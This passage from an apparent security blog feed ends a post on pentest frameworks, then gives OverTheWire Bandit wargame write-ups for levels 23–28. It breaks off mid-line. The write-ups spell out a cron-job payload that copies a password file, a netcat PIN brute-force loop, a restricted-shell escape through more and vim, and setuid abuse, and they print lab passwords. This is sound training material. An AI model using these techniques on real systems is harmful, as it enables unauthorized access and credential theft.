<p><strong>OWASP MASTG</strong> — Mobile Application Security Testing Guide. Same philosophy as WSTG but for Android and iOS. Covers platform-specific attack surfaces like insecure storage, improper platform usage, and reverse engineering of mobile binaries.</p>
<p><strong>PCI DSS Penetration Testing Guidelines</strong> — Compliance-driven. If the target handles payment card data, PCI DSS mandates specific testing requirements. You don't choose this one — the compliance requirement chooses it for you.</p>
<p><strong>CBEST Framework</strong> — UK financial sector specific. Intelligence-led penetration testing for critical financial infrastructure. Threat-intelligence driven — you model real threat actors likely to target the specific institution before testing begins.</p>
<hr>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="choosing-the-right-framework">Choosing the Right Framework<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/02/pentesting-frameworks#choosing-the-right-framework" class="hash-link" aria-label="Direct link to Choosing the Right Framework" title="Direct link to Choosing the Right Framework" translate="no">​</a></h2>
<p>The honest answer: you almost never use just one, and you almost never follow any of them completely.</p>
<p>A practical mapping:</p>
<table><thead><tr><th>Scenario</th><th>Primary Framework</th><th>Supplement With</th></tr></thead><tbody><tr><td>Web app bug bounty</td><td>OWASP WSTG</td><td>MITRE ATT&amp;CK for reporting</td></tr><tr><td>Corporate network pentest</td><td>PTES</td><td>NIST 800-115 for process rigor</td></tr><tr><td>Compliance audit</td><td>NIST 800-115 or PCI DSS</td><td>OSSTMM if they want RAV scoring</td></tr><tr><td>Mobile app assessment</td><td>OWASP MASTG</td><td>WSTG for any web backend</td></tr><tr><td>Red team engagement</td><td>PTES + MITRE ATT&amp;CK</td><td>Threat-intel to model adversary</td></tr><tr><td>Cloud environment</td><td>CSA CCM</td><td>PTES for execution</td></tr></tbody></table>
<p>The real skill isn't memorizing frameworks — it's knowing which parts of which framework apply to your current target, and using them as a checklist to make sure you haven't missed an entire attack category. The moment you're mid-engagement and you realize you haven't tested auth token expiry or checked for IDOR on a numeric ID endpoint — that's OWASP WSTG's job to catch.</p>
<p>Frameworks are a forcing function against tunnel vision.</p>]]></content:encoded>
            <category>cybersecurity</category>
            <category>penetration testing</category>
            <category>frameworks</category>
            <category>red team</category>
        </item>
        <item>
            <title><![CDATA[Bandit Level 23 → 24]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-23-24</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-23-24</guid>
            <pubDate>Sun, 12 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Login: ssh bandit23@bandit.labs.overthewire.org -p 2220]]></description>
            <content:encoded><![CDATA[<p><strong>Login:</strong> <code>ssh bandit23@bandit.labs.overthewire.org -p 2220</code><br>
<strong>Password:</strong> <code>0Zf11ioIjMVN551jX3CmStKLYqjk54Ga</code></p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="task">task<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-23-24#task" class="hash-link" aria-label="Direct link to task" title="Direct link to task" translate="no">​</a></h3>
<p>A program is running automatically at regular intervals from <strong>cron</strong>. Look in <strong>/etc/cron.d/</strong> for the configuration and see what command is being executed.</p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="theory-lil-bit">theory lil bit<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-23-24#theory-lil-bit" class="hash-link" aria-label="Direct link to theory lil bit" title="Direct link to theory lil bit" translate="no">​</a></h3>
<ol>
<li class=""><strong>Cronjobs running as other users</strong>: The script is scheduled in <code>/etc/cron.d</code> to run as the <code>bandit24</code> user. This means any commands executed by the script run with <code>bandit24</code>'s privileges.</li>
<li class=""><strong>File Ownership (<code>stat -c "%U"</code>)</strong>: The cron script checks the owner of the files in a specific directory. It specifically looks for files owned by <code>bandit23</code> to execute.</li>
<li class=""><strong>Payload Execution</strong>: If the script finds a file owned by <code>bandit23</code>, it executes it. By writing a simple bash script that copies the password to a world-writable directory, we can trick <code>bandit24</code> into doing the heavy lifting for us.</li>
<li class=""><strong>Permissions (<code>chmod 777</code>)</strong>: Since the script runs as <code>bandit24</code>, it needs permission to write the output file into our <code>bandit23</code> temporary directory. Setting the directory permissions to <code>777</code> ensures this works.</li>
</ol>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="solution">solution<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-23-24#solution" class="hash-link" aria-label="Direct link to solution" title="Direct link to solution" translate="no">​</a></h3>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain"># 1. Check the cron configuration for bandit24</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">bandit23@bandit:~$ cd /etc/cron.d</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">@reboot bandit24 /usr/bin/cronjob_bandit24.sh &amp;&gt; /dev/null</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &amp;&gt; /dev/null</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># 2. Analyze the script logic</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">#!/bin/bash</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">shopt -s nullglob</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">myname=$(whoami)</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">cd /var/spool/"$myname"/foo || exit </span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">echo "Executing and deleting all scripts in /var/spool/$myname/foo:"</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">for i in * .*;</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">do</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">    if [ "$i" != "." ] &amp;&amp; [ "$i" != ".." ];</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">    then</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">        echo "Handling $i"</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">        owner="$(stat --format "%U" "./$i")"</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">        if [ "${owner}" = "bandit23" ] &amp;&amp; [ -f "$i" ]; then</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">            timeout -s 9 60 "./$i"</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">        fi</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">        rm -rf "./$i"</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">    fi</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">done</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># The script goes to /var/spool/bandit24/foo</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># If it finds a file owned by bandit23, it executes it, then deletes it.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># 3. Create a temporary directory to work in</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">bandit23@bandit:/etc/cron.d$ mktemp -d</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">/tmp/tmp.RXCBGeylmO</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">bandit23@bandit:/etc/cron.d$ cd /tmp/tmp.RXCBGeylmO</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># 4. Give read/write/execute permissions to everyone on the temp directory</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># This allows bandit24 to write the password file here</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">bandit23@bandit:/tmp/tmp.RXCBGeylmO$ chmod 777 .</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># 5. Create the payload script to steal the password</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># (Using nano or echo to write the script)</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">bandit23@bandit:/tmp/tmp.RXCBGeylmO$ echo '#!/bin/bash' &gt; bandit24.sh</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">bandit23@bandit:/tmp/tmp.RXCBGeylmO$ echo 'cat /etc/bandit_pass/bandit24 &gt; /tmp/tmp.RXCBGeylmO/password.txt' &gt;&gt; bandit24.sh</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># 6. Make the script executable</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">bandit23@bandit:/tmp/tmp.RXCBGeylmO$ chmod +rwx bandit24.sh</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># 7. Copy the payload script into the target directory where the cronjob looks</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">bandit23@bandit:/tmp/tmp.RXCBGeylmO$ cp bandit24.sh /var/spool/bandit24/foo/myscript.sh</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># 8. Wait a minute for the cronjob to run, then check for the new password file</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">bandit23@bandit:/tmp/tmp.RXCBGeylmO$ ls -la</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">total 180</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">drwxrwxrwx  2 bandit23 bandit23  4096 Apr 11 20:45 .</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">drwxrwx-wt 4284 root     root    167936 Apr 11 20:45 ..</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">-rwxrwxr-x  1 bandit23 bandit23    77 Apr 11 20:43 bandit24.sh</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">-rw-rw-r--  1 bandit24 bandit24    33 Apr 11 20:45 password.txt</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># 9. Read the target password</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">bandit23@bandit:/tmp/tmp.RXCBGeylmO$ cat password.txt</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8</span><br></span></code></pre></div></div>
<p><code>&lt;!-- truncate --&gt;</code></p>]]></content:encoded>
            <category>bandit</category>
            <category>overthewire</category>
            <category>cybersecurity</category>
        </item>
        <item>
            <title><![CDATA[Bandit Level 24 → 25]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-24-25</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-24-25</guid>
            <pubDate>Sun, 12 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Login: ssh bandit24@bandit.labs.overthewire.org -p 2220]]></description>
            <content:encoded><![CDATA[<p><strong>Login:</strong> <code>ssh bandit24@bandit.labs.overthewire.org -p 2220</code><br>
<strong>Password:</strong> <code>gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8</code></p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="task">task<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-24-25#task" class="hash-link" aria-label="Direct link to task" title="Direct link to task" translate="no">​</a></h3>
<p>A daemon is listening on port <code>30002</code> and will give you the password for <code>bandit25</code> if given the password for <code>bandit24</code> and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.</p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="theory-lil-bit">theory lil bit<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-24-25#theory-lil-bit" class="hash-link" aria-label="Direct link to theory lil bit" title="Direct link to theory lil bit" translate="no">​</a></h3>
<ol>
<li class=""><strong>Process Enumeration</strong>: Using <code>ps aux | grep</code> helps identify background services or processes running under specific user accounts.</li>
<li class=""><strong>Port Scanning</strong>: <code>nmap</code> is used to verify if a specific port on <code>localhost</code> is actually open and listening.</li>
<li class=""><strong>Manual Interaction</strong>: Before writing a script, it's crucial to connect to the service manually (using <code>nc</code>) to understand exactly what input format the program expects and what output it gives.</li>
<li class=""><strong>Brute-Forcing with Loops</strong>: A bash <code>for</code> loop combined with brace expansion <code>{0000..9999}</code> is the fastest way to generate all possible 4-digit PINs. Piping (<code>|</code>) this massive output directly into <code>nc</code> automates the attack.</li>
</ol>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="my-approach--solution">my approach / solution<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-24-25#my-approach--solution" class="hash-link" aria-label="Direct link to my approach / solution" title="Direct link to my approach / solution" translate="no">​</a></h3>
<p><strong>1. Reconnaissance:</strong>
First, I wanted to see if there were any obvious processes running for <code>bandit25</code>.</p>
<p><code>bandit24@bandit:~$ ps aux | grep bandit25</code></p>
<p>I also poked around <code>/var/run</code> to see if there were any interesting socket or PID files, but didn't find anything immediately useful for this challenge.</p>
<p><strong>2. Verifying the Port:</strong>
I knew from the prompt that a service was on port 30002. After a quick typo with an <code>nmap</code> flag, I scanned the port locally to confirm it was up and listening as <code>pago-services2</code>.</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain">bandit24@bandit:~$ nmap localhost -p 30002</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Starting Nmap 7.94SVN ...</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">PORT      STATE SERVICE</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">30002/tcp open  pago-services2</span><br></span></code></pre></div></div>
<p><strong>3. Manual Testing:</strong>
Before writing any scripts, I connected manually to see what the daemon actually wanted. First, I just piped the password, but it failed. Then, I connected interactively and typed a few random guesses (<code>0 0 0 0</code>, <code>0 0 0 1</code>) to see how it handled bad inputs.</p>
<p><code>bandit24@bandit:~$ nc localhost 30002</code>
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
0 0 0 0
Wrong! Please enter the correct current password and pincode. Try again.</p>
<p><strong>4. The Brute-Force Attack:</strong>
Once I understood the format (<code>&lt;password&gt; &lt;pin&gt;</code>), I wrote a one-liner bash <code>for</code> loop to generate all numbers from 0000 to 9999. I echoed the password alongside the generated PIN and piped the entire 10,000-line stream directly into the netcat connection.</p>
<p><code>bandit24@bandit:~$ for i in {0000..9999}; do echo "gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8 $i"; done | nc localhost 30002</code></p>
<p><strong>5. Catching the Flag:</strong>
The script fired off thousands of attempts in seconds. The terminal flooded with "Wrong!" messages until it finally hit the correct PIN, breaking the loop with the success message:</p>
<p>Wrong! Please enter the correct current password and pincode. Try again.
Correct! The password of user bandit25 is iCi86ttT4KSNe1armKiwbQNmB3YJP3q4</p>
<p><code>&lt;!-- truncate --&gt;</code></p>]]></content:encoded>
            <category>bandit</category>
            <category>overthewire</category>
            <category>cybersecurity</category>
        </item>
        <item>
            <title><![CDATA[Bandit Level 25 → 26]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-25-26</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-25-26</guid>
            <pubDate>Sun, 12 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Login: ssh bandit25@bandit.labs.overthewire.org -p 2220]]></description>
            <content:encoded><![CDATA[<p><strong>Login:</strong> <code>ssh bandit25@bandit.labs.overthewire.org -p 2220</code><br>
<strong>Password:</strong> <code>iCi86ttT4KSNe1armKiwbQNmB3YJP3q4</code></p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="task">task<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-25-26#task" class="hash-link" aria-label="Direct link to task" title="Direct link to task" translate="no">​</a></h3>
<p>Logging in to <code>bandit26</code> from <code>bandit25</code> should be quite easy. The shell for user <code>bandit26</code> is not <code>/bin/bash</code>, but something else. Find out what it is, how it works, and how to break out of it.</p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="theory-lil-bit">theory lil bit<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-25-26#theory-lil-bit" class="hash-link" aria-label="Direct link to theory lil bit" title="Direct link to theory lil bit" translate="no">​</a></h3>
<ol>
<li class=""><strong>SSH Key Permissions</strong>: SSH is very strict about security. If a private key file (<code>.sshkey</code>) is readable by other users, SSH will reject it to prevent abuse. You must set permissions to <code>700</code> or <code>600</code>.</li>
<li class=""><strong>Custom Login Shells</strong>: The <code>/etc/passwd</code> file defines what program runs when a user logs in. It doesn't have to be a standard shell like <code>/bin/bash</code>; it can be any executable script. If that script exits, your SSH session ends.</li>
<li class=""><strong>Escaping Pagers (<code>more</code>)</strong>: When a program like <code>more</code> (a pager) outputs text that is larger than your terminal window, it pauses. While paused, you can use built-in commands. Pressing <code>v</code> tells <code>more</code> to open the current file in the <code>vim</code> text editor.</li>
<li class=""><strong>Vim Shell Escaping</strong>: <code>vim</code> has the ability to run system commands or spawn a new shell. By changing vim's internal shell setting (<code>:set shell=/bin/bash</code>) and then calling it (<code>:shell</code>), you can break out of a restricted environment and get a fully functional terminal.</li>
</ol>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="my-approach--solution">my approach / solution<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-25-26#my-approach--solution" class="hash-link" aria-label="Direct link to my approach / solution" title="Direct link to my approach / solution" translate="no">​</a></h3>
<p><strong>1. Finding and Fixing the SSH Key:</strong>
I logged in and found <code>bandit26.sshkey</code> right in the home directory. I tried to use it to SSH into <code>bandit26</code>, but SSH yelled at me about bad permissions:</p>
<p>WARNING: UNPROTECTED PRIVATE KEY FILE!
Permissions 0755 for 'bandit26.sshkey' are too open.</p>
<p>I fixed this by restricting the permissions so only my user could read it:
bandit25@bandit:~$ chmod 700 bandit26.sshkey</p>
<p><strong>2. The Disappearing Shell Problem:</strong>
When I tried to SSH after fixing the key, the server displayed an OverTheWire banner and then immediately kicked me out. I needed to figure out what was happening upon login.</p>
<p>I checked the <code>/etc/passwd</code> file for <code>bandit26</code> to see what shell it was using:
bandit25@bandit:~$ cat /etc/passwd | grep bandit26
bandit26<!-- -->❌<!-- -->11026:11026<!-- -->:bandit<!-- --> level 26:/home/bandit26:/usr/bin/showtext</p>
<p>Instead of <code>/bin/bash</code>, it was running a custom script called <code>/usr/bin/showtext</code>. I checked the contents of that script:
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh
export TERM=linux
exec more ~/text.txt
exit 0</p>
<p><strong>3. Breaking out of <code>more</code>:</strong>
The script simply runs <code>more</code> on a text file and then exits. If I could interact with <code>more</code> before it finished printing the file, I could escape it. I reduced my terminal window size (so the text wouldn't fit on one screen) forcing <code>more</code> to pause.</p>
<p>I logged in via SSH again, but this time i resized my terminal to a very small size... the screen paused at the bottom ... instead of hitting space to scroll .. i pressed the <code>v</code> key on my keyboard. This is a built-in shortcut that opens the current text block in the <code>vim</code> editor.</p>
<p><strong>4. Spawning a bash shell from Vim:</strong>
Once inside Vim, I had the ability to run commands. I pressed <code>:</code> to enter command mode and changed Vim's default shell to bash:
<!-- -->:set<!-- --> shell=/bin/bash</p>
<p>Then, I pressed <code>:</code> again and told vim to spawn that shell:
<!-- -->:shell<!-- -->
and yeah ....i was dropped into a normal bash terminal as the user <code>bandit26</code>.</p>
<p><strong>5. Catching the Flag:</strong>
Now that I had a fully interactive shell, I simply read the password file for <code>bandit26</code>:
bandit26@bandit:~$ cat /etc/bandit_pass/bandit26
s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ</p>
<p><code>&lt;!-- truncate --&gt;</code></p>]]></content:encoded>
            <category>bandit</category>
            <category>overthewire</category>
            <category>cybersecurity</category>
        </item>
        <item>
            <title><![CDATA[Bandit Level 26 → 27]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-26-27</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-26-27</guid>
            <pubDate>Sun, 12 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Login: ssh bandit26@bandit.labs.overthewire.org -p 2220]]></description>
            <content:encoded><![CDATA[<p><strong>Login:</strong> <code>ssh bandit26@bandit.labs.overthewire.org -p 2220</code><br>
<strong>Password:</strong> <code>s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ</code></p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="task">task<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-26-27#task" class="hash-link" aria-label="Direct link to task" title="Direct link to task" translate="no">​</a></h3>
<p>Good job getting a shell! Now, there is a setuid binary in the homedirectory that does things for the next user. Find out how to use it to get the password.</p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="theory-lil-bit">theory lil bit<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-26-27#theory-lil-bit" class="hash-link" aria-label="Direct link to theory lil bit" title="Direct link to theory lil bit" translate="no">​</a></h3>
<ol>
<li class=""><strong>SUID (Set User ID)</strong>: Sometimes executables are configured to run with the permissions of the user who <em>owns</em> the file, rather than the user who <em>runs</em> the file. This script is owned by <code>bandit27</code> and has the SUID bit set, meaning any command we pass into it will be executed with <code>bandit27</code>'s privileges.</li>
</ol>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="my-approach--solution">my approach / solution<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-26-27#my-approach--solution" class="hash-link" aria-label="Direct link to my approach / solution" title="Direct link to my approach / solution" translate="no">​</a></h3>
<p><strong>1. Inspect the home directory:</strong>
Right after breaking out of the Vim shell from the previous level, I checked what was sitting in the home directory.</p>
<p>bandit26@bandit:~$ ls
bandit27-do  text.txt</p>
<p><strong>2. Figure out the binary:</strong>
I ran the <code>bandit27-do</code> executable without any arguments to see if it had a help menu or expected syntax. It clearly stated it runs commands as another user.</p>
<p>bandit26@bandit:~$ ./bandit27-do
Run a command as another user.
Example: ./bandit27-do id</p>
<p><strong>3. Test the execution:</strong>
I ran the example command to verify it was working as intended. The output showed my effective user ID (<code>euid</code>) successfully shifted to <code>bandit27</code>.</p>
<p>bandit26@bandit:~$ ./bandit27-do id
uid=11026(bandit26) gid=11026(bandit26) euid=11027(bandit27) groups=11026(bandit26)</p>
<p><strong>4. Capture the password:</strong>
Since I now had a direct way to execute commands as <code>bandit27</code>, I used the binary to read the protected password file for the next level.</p>
<p>bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
upsNCc7vzaRDx6oZC6GiR6ERwe1MowGB</p>
<p><code>&lt;!-- truncate --&gt;</code></p>]]></content:encoded>
            <category>bandit</category>
            <category>overthewire</category>
            <category>cybersecurity</category>
        </item>
        <item>
            <title><![CDATA[Bandit Level 27 → 28]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-27-28</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-27-28</guid>
            <pubDate>Sun, 12 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Login: ssh bandit27@bandit.labs.overthewire.org -p 2220]]></description>
            <content:encoded><![CDATA[<p><strong>Login:</strong> <code>ssh bandit27@bandit.labs.overthewire.org -p 2220</code><br>
<strong>Password:</strong> <code>Ups6nC7Sc695jSGEB7L9J9J6AFRowFuJ</code></p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="task">task<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-27-28#task" class="hash-link" aria-label="Direct link to task" title="Direct link to task" translate="no">​</a></h3>
<p>A git repository is at <code>ssh://bandit27-git@bandit.labs.overthewire.org:2220/home/bandit27-git/repo</code>. The password for the user <code>bandit27-git</code> is the same as the password for the user <code>bandit27</code>. Clone the repository and find the password for the next level.</p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="theory-lil-bit">theory lil bit<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-27-28#theory-lil-bit" class="hash-link" aria-label="Direct link to theory lil bit" title="Direct link to theory lil bit" translate="no">​</a></h3>
<ol>
<li class=""><strong>Git Clone</strong>: The <code>git clone</code> command is used to create a copy of a specific repository from a remote server onto your local machine.</li>
<li class=""><strong>SSH Protocol</strong>: Git can use SSH for data transfer. The URL specifies the user, the host, the port (<code>2220</code>), and the path to the repository.</li>
<li class=""><strong>Repository Exploration</strong>: After cloning, you enter the directory to find the files that were tracked by the repository.</li>
<li class=""><strong>Authentication</strong>: Since the git user <code>bandit27-git</code> shares the password with the shell user <code>bandit27</code>, you simply reuse the current level's password when prompted.</li>
</ol>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="solution">solution<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/04/12/bandit-27-28#solution" class="hash-link" aria-label="Direct link to solution" title="Direct link to solution" translate="no">​</a></h3>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain"># Create a temporary directory to work in</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">┌──(sssubhammm ⌘ macbook-air)-[~]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ mkdir /tmp/my_git_repo &amp;&amp; cd /tmp/my_git_repo</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># Clone the remote repository using the provided SSH URL</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># Use the bandit27 password when prompted</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">┌──(sssubhammm ⌘ macbook-air)-[/tmp/my_git_repo]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ git clone ssh://bandit27-git@bandit.labs.overthewire.org:2220/home/bandit27-git/repo</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Cloning into 'repo'...</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">bandit27-git@bandit.labs.overthewire.org's password: </span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">remote: Enumerating objects: 3, done.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">remote: Counting objects: 100% (3/3), done.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">remote: Compressing objects: 100% (2/2), done.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Receiving objects: 100% (3/3), done.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># Navigate into the cloned directory and check the contents</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">┌──(sssubhammm ⌘ macbook-air)-[/tmp/my_git_repo]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ cd repo</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">┌──(sssubhammm ⌘ macbook-air)-[/tmp/my_git_repo/repo]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ ls</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">README</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># Read the README file to retrieve the password</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">┌──(sssubhammm ⌘ macbook-air)-[/tmp/my_git_repo/repo]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ cat README</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">The password to the next level is: 